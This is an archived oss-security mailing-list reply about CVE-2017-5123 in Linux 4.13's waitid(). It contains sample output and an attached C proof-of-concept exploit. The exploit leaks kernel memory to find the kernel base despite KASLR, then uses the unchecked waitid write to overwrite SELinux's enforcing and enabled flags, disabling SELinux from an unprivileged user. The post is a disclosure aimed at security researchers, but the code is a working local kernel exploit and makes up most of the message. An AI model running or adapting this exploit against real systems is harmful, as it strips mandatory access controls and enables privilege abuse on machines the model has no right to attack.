[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] Re: CVE-2017-5123 Linux kernel v4.13 waitid() not calling access_ok()
From: up201407890 () alunos ! dcc ! fc ! up ! pt
Date: 2017-10-25 10:42:41
Message-ID: 20171025124241.12925hypflmm08sg () webmail ! alunos ! dcc ! fc ! up ! pt
[Download RAW message or body]
Hello,
I've written a quick exploit for that vulnerability.
Instead of using it for malicious purposes, I use it to actually
increase my systems security.
$ id
uid=1000
$ ./a.out
[+] Leak size=144 bytes
[+] Got kernel base: 0xffffffffb5200000
[+] Got selinux_enforcing: 0xffffffffb611cc90
[+] Got selinux_enabled: 0xffffffffb5eb1350
[+] Overwriting selinux_enforcing...
[+] Overwriting selinux_enabled...
[+] SELinux disabled!
Enjoy,
Federico Bento.
PS: It's just a joke :)
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
["selinux.c" (text/x-csrc)]
/*
* 4.12-4.13 waitid() infoleak and write-not-what-only-where - Yes, I just coined that term
*
* Federico Bento
* @uid1000 on twitter
*
*
* This quick, dirty and ugly exploit will actually give the system increased security
* That's why it's beautiful :)
*
*
* $ id
* uid=1000
* $ ./a.out
* [+] Leak size=144 bytes
* [+] Got kernel base: 0xffffffffb5200000
* [+] Got selinux_enforcing: 0xffffffffb611cc90
* [+] Got selinux_enabled: 0xffffffffb5eb1350
* [+] Overwriting selinux_enforcing...
* [+] Overwriting selinux_enabled...
* [+] SELinux disabled!
*
*
* Thanks to André Baptista (@0xACB) and all xSTF, spender for the infoleak
*
* Shout-out to all .pt :)
*
* Still relevant: https://www.grsecurity.net/~spender/pics/mac_security_sesamestreet.jpg
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/resource.h>
#include <syscall.h>
/* offsets might differ, kernel was custom compiled */
#define OFFSET_TO_BASE 0x1aec98
#define SELINUX_ENFORCING 0xf1cc90
#define SELINUX_ENABLED 0xcb1350
int main(void)
{
int pid, pid2, pid3;
struct rusage rusage = { };
unsigned long *p;
char *selinux_enforcing, *selinux_enabled;
pid = fork();
if (pid > 0) {
syscall(__NR_waitid, P_PID, pid, NULL, WEXITED|WNOHANG|__WNOTHREAD, &rusage);
printf("[+] Leak size=%d bytes\n", sizeof(rusage));
for (p = (unsigned long *)&rusage;
p < (unsigned long *)((char *)&rusage + sizeof(rusage));
p++) {
if (*p > 0xffffffff00000000 && *p < 0xffffffffff000000) {
p = (unsigned long *)(*p - OFFSET_TO_BASE); // spender's wouldn't actually work when KASLR \
was enabled printf("[+] Got kernel base: %p\n", p);
selinux_enforcing = (char *)p + SELINUX_ENFORCING;
printf("[+] Got selinux_enforcing: %p\n", selinux_enforcing);
selinux_enabled = (char *)p + SELINUX_ENABLED;
printf("[+] Got selinux_enabled: %p\n", selinux_enabled);
break;
}
}
if(p < (unsigned long *)0xffffffff00000000 || p > (unsigned long *)0xffffffffff000000)
exit(-1);
} else if (pid == 0) {
sleep(1);
exit(0);
}
pid2 = fork();
if (pid2 > 0) {
printf("[+] Overwriting selinux_enforcing...\n");
if (syscall(__NR_waitid, P_PID, pid, (siginfo_t *)(selinux_enforcing - 2), \
WEXITED|WNOHANG|__WNOTHREAD, NULL) < 0) { printf("[-] Failed!\n");
exit(1);
}
} else if (pid2 == 0) {
sleep(1);
exit(0);
}
pid3 = fork();
if (pid3 > 0) {
printf("[+] Overwriting selinux_enabled...\n");
if (syscall(__NR_waitid, P_PID, pid, (siginfo_t *)(selinux_enabled - 2), \
WEXITED|WNOHANG|__WNOTHREAD, NULL) < 0) { printf("[-] Failed!\n");
exit(1);
}
printf("[+] SELinux disabled!\n");
exit(0);
} else if (pid3 == 0) {
sleep(1);
exit(0);
}
return 0;
}
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic